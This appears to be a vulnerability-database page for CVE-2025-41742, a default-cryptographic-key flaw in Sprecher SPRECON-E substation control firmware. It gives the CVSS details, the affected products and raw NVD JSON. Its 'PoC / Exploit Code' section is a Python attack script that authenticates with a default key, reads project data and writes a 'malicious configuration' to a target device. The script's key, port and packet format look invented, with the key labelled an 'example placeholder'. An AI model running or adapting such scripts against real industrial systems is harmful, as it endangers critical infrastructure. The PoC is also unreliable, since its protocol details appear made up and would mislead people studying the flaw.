Security Vulnerability Report
CVE-2025-41742 CVSS 9.8 CRITICAL

Published: 2025-12-02 11:15:51
Last Modified: 2026-02-23 17:15:45

Description

Sprecher Automation's SPRECON-E-C, SPRECON-E-P, and SPRECON-E-T3 are vulnerable to attack by an unauthorized remote attacker via default cryptographic keys. The use of these keys allows the attacker to read, modify, and write projects and data, or to access any device via remote maintenance.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:sprecher-automation:sprecon-e-c_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sprecher-automation:sprecon-e-c:*:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sprecher-automation:sprecon-e-p_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sprecher-automation:sprecon-e-p:*:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sprecher-automation:sprecon-e-t3_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sprecher-automation:sprecon-e-t3:*:*:*:*:*:*:*:* - NOT VULNERABLE
SPRECON-E-C (all versions)
SPRECON-E-P (all versions)
SPRECON-E-T3 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-41742 PoC - Sprecher SPRECON-E Default Encryption Key Exploitation
Note: This is for educational and authorized testing purposes only
"""
import socket
import struct
import hashlib

TARGET_HOST = "target_device_ip"
TARGET_PORT = 12345
DEFAULT_KEY = b"SPRECON_E_DEFAULT_KEY_16B"  # Example placeholder key


def generate_session_key(default_key, nonce):
    """Generate session encryption key using default key and nonce"""
    return hashlib.sha256(default_key + nonce).digest()[:16]


def exploit_default_key():
    """Attempt to exploit default encryption key vulnerability"""
    sock = None  # defined up front so the finally block is safe if socket creation fails
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((TARGET_HOST, TARGET_PORT))

        # Step 1: Send authentication request with default key
        nonce = b"\x00" * 16  # Server nonce
        session_key = generate_session_key(DEFAULT_KEY, nonce)
        auth_packet = struct.pack('>I', 0x01) + session_key + nonce
        sock.send(auth_packet)

        # Step 2: Receive authentication response
        response = sock.recv(1024)
        if response and response[0:4] == b"\x00\x00\x00\x01":
            print("[+] Authentication successful with default key")

            # Step 3: Read project data
            read_cmd = struct.pack('>I', 0x02) + b"\x01\x00\x00\x00"
            sock.send(read_cmd)
            project_data = sock.recv(4096)
            print(f"[+] Project data retrieved: {len(project_data)} bytes")

            # Step 4: Write malicious configuration
            malicious_config = b"MALICIOUS_CONFIG_DATA"
            write_cmd = struct.pack('>I', 0x03) + malicious_config
            sock.send(write_cmd)
            print("[+] Malicious configuration written successfully")
            return True
        else:
            print("[-] Authentication failed")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False
    finally:
        if sock is not None:
            sock.close()


if __name__ == "__main__":
    print("CVE-2025-41742 PoC - SPRECON-E Default Key Exploitation")
    exploit_default_key()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41742", "sourceIdentifier": "[email protected]", "published": "2025-12-02T11:15:51.153", "lastModified": "2026-02-23T17:15:44.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sprecher Automations SPRECON-E-C,  SPRECON-E-P, SPRECON-E-T3 is vulnerable to attack by an unauthorized remote attacker via default cryptographic keys. The use of these keys allows the attacker to read, modify, and write projects and data, or to access any device via remote maintenance."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1394"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sprecher-automation:sprecon-e-c_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "9DF00EFE-05D9-48D1-9D32-B0E4E40D14F3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sprecher-automation:sprecon-e-c:*:*:*:*:*:*:*:*", "matchCriteriaId": "17CF3E5A-AAD9-4B96-945D-501E461661CC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sprecher-automation:sprecon-e-p_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F27A10F8-544C-4B48-9FB9-198D79CCB885"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": 
"cpe:2.3:h:sprecher-automation:sprecon-e-p:*:*:*:*:*:*:*:*", "matchCriteriaId": "E0CC75D6-DD26-42A0-83F4-69423D8F5284"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sprecher-automation:sprecon-e-t3_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "B0BDEAF2-092F-413D-9D16-AAFA484D13AB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sprecher-automation:sprecon-e-t3:*:*:*:*:*:*:*:*", "matchCriteriaId": "6384D2B2-DCDA-445B-8336-E4EF0E2B3267"}]}]}], "references": [{"url": "https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511042_de.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}